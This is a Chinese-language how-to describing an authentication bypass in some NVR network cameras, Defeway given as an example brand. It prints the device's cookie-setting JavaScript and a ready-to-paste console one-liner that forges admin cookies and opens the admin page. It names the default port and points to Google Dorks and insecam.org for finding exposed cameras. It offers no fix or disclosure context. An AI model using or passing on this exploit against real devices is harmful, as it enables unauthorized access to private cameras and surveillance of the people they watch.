攝影機 NVR « 網路視頻客戶端 » : 繞過身份驗證

內容

如標題所示,某些監控攝像頭的型號可以在沒有密碼的情況下訪問(管理員訪問)。

易受攻擊的模型有很多。我們可以舉例提到品牌 Defeway。漏洞來自嵌入式系統,更確切地說,是來自網頁伺服器及其認證系統。

這些攝影機可以通過其網頁介面識別,該介面看起來像這樣:

NVR 相機視頻客戶端網頁介面連接

供您參考,預設端口是 60001.

要訪問管理介面,只需調用位於 /js/cookie.js 中的 javascript 函數: login t_set();

這是他的代碼:

function login\_set(usr,pwd,iSetAble,iPlayBack){ pwd = !pwd ? 'null' : pwd; Cookies.set("dvr\_usr", usr); Cookies.set("dvr\_pwd", pwd); Cookies.set("iSetAble", iSetAble); Cookies.set("iPlayBack", iPlayBack); }

您會注意到,該功能並不負責驗證數據。它只是寫入4個cookie,並使用提供給它的數據。

在這些數據中:

  • dvr_usr: 使用者名稱: « admin » 為預設值,但其他值也可以使用。
  • dvr_pwd: 完全虛構的密碼,我們不在乎。
  • iSetAble: 1 代表管理員
  • iPlayBack: 1 以便能夠觀看視頻流

一旦進入身份驗證頁面,我們打開開發者控制台或JavaScript(在大多數瀏覽器中按F12)。然後我們插入以下代碼:

login_set('admin','被盜',1,1);document.location="/view2.html";

第一行創建身份驗證的 cookies,第二行將您重定向到管理頁面。對於第一行,我們也可以這樣做:

login_set(1,1,1,1);

然後在地址欄中輸入 : http://ip target:port/view2.html

執行身份驗證腳本…

顯示管理頁面完成後...

您可以透過「Google Dorks」或直接透過 insecam.org 找到這些攝影機

總結
某些監視攝影機型號的管理介面可以無需密碼直接訪問,這些脆弱的型號包括Defeway品牌。漏洞源於其嵌入式系統的網頁伺服器及其身份驗證系統。這些攝影機的網頁介面特徵明顯,預設端口為60001。透過一段JavaScript函數login_set(),用戶可以輕易地創建認證cookie,進而訪問管理介面。該函數不檢查輸入數據,只是將提供的數據寫入cookie。用戶只需在開發者控制台中執行相應的代碼,即可進入管理頁面。這一漏洞使得不法分子能夠輕易地訪問和控制這些攝影機,並可透過Google Dorks或insecam.org尋找這些設備。